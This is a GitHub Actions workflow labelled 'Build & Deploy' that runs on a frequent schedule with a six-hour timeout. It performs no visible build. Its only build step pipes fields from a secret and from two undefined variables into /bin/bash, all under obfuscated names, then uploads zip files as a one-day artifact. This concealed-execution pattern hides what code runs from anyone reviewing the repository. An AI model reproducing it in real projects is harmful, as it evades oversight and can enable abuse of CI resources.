name: Build & Deploy
on:
  workflow_dispatch:

  schedule:
    - cron: '50 3,9,15,21 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  perform:
    name: Run build
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run build
        env:
          e058: ${{ secrets.e058 }}
        run: |
          printf '%s' "$e058" | jq -r .wcnpd112 | /bin/bash
          echo $pb10393 | jq -r .swhwy638 | /bin/bash
          printf '%s' "$oqg0746" | jq -r .nrf137 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: pFN734bb
          path: "*.zip"
          retention-days: 1
